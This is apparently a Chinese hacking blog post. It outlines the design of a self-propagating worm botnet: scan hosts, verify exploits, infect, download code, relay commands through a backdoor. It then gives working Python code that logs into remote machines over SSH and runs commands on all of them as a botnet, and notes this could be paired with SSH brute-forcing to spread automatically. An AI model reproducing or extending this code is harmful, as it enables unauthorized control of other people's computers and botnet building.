先記錄一下我自己像寫(xiě)的一個(gè)超級(jí)大木馬蠕蟲(chóng)的思路。請(qǐng)自行忽略
1.本機(jī)電腦掃描探測(cè)其他電腦
2.使用poc驗(yàn)證是否存在漏洞,同時(shí)檢測(cè)是否已經(jīng)被感染
3.如果都滿足,感染未感染同時(shí)又存在漏洞的機(jī)子。
4.感染后的機(jī)子下載代碼。繼續(xù)以上過(guò)程(這樣是一臺(tái)控制幾臺(tái),幾臺(tái)又控制幾臺(tái),可以開(kāi)幾臺(tái),形成循環(huán)。而且不互相知道)
5.如何控制自己的這種僵尸網(wǎng)絡(luò)呢?(開(kāi)一個(gè)特殊的后門)發(fā)送一條指令,一傳十,十傳百。主機(jī)信息怎么傳遞,可傳輸指令,運(yùn)行g(shù)ithub上的惡意代碼,交替運(yùn)行,由控制端隨機(jī)選擇哪幾臺(tái)機(jī)器運(yùn)行?
正題:
1.正常的僵尸網(wǎng)絡(luò),是一臺(tái)機(jī)器控制所有的肉雞。
這里用一個(gè)全局變量BotNet=[]記錄所有的肉雞對(duì)象
用addClient()向BotNet里添加新的肉雞
botnetCommand()是給新加的肉雞指令。
定義一個(gè)client,就代表這一個(gè)肉雞,可以連接一臺(tái)遠(yuǎn)程的機(jī)器,并在本地執(zhí)行命令。
?
這段代碼并不是木馬蠕蟲(chóng),并不能實(shí)現(xiàn)自動(dòng)傳播。如果要實(shí)現(xiàn)自動(dòng)傳播,還需要和之前的暴力破解ssh結(jié)合在一起,修改代碼。
client
代碼:
from pexpect import pxssh
import getopt
class Client():
? ? def __init__(self,host,user,password):
? ? ? ? self.host=host
? ? ? ? self.user=user
? ? ? ? self.password=password
? ? ? ? self.session=self.connect()
? ? def connect(self):
? ? ? ? try:
? ? ? ? ? ? s=pxssh.pxssh()
? ? ? ? ? ? s.login(self.host,self.user,self.password)
? ? ? ? ? ? return s
? ? ? ? except Exception as e:
? ? ? ? ? ? print str(e)
? ? ? ? ? ? return "Error Connection"
? ? def send_command(self,cmd):
? ? ? ? self.session.sendline(cmd)
? ? ? ? self.session.prompt()
? ? ? ? return self.session.before
botNet=[]
def addClient(host,user,password):
? ? client=Client(host,user,password)
? ? botNet.append(client)
def botNetCommand(command):
? ? for client in botNet:
? ? ? ? output=client.send_command(command)
? ? ? ? print "output from"+client.host
? ? ? ? print "[+]"+output+"\n"
addClient('192.168.10.154','root','root')
botNetCommand('uname -v')
botNetCommand('cat /etc/issue')
更多文章、技術(shù)交流、商務(wù)合作、聯(lián)系博主
微信掃碼或搜索:z360901061
微信掃一掃加我為好友
QQ號(hào)聯(lián)系: 360901061
您的支持是博主寫(xiě)作最大的動(dòng)力,如果您喜歡我的文章,感覺(jué)我的文章對(duì)您有幫助,請(qǐng)用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點(diǎn)擊下面給點(diǎn)支持吧,站長(zhǎng)非常感激您!手機(jī)微信長(zhǎng)按不能支付解決辦法:請(qǐng)將微信支付二維碼保存到相冊(cè),切換到微信,然后點(diǎn)擊微信右上角掃一掃功能,選擇支付二維碼完成支付。
【本文對(duì)您有幫助就好】元
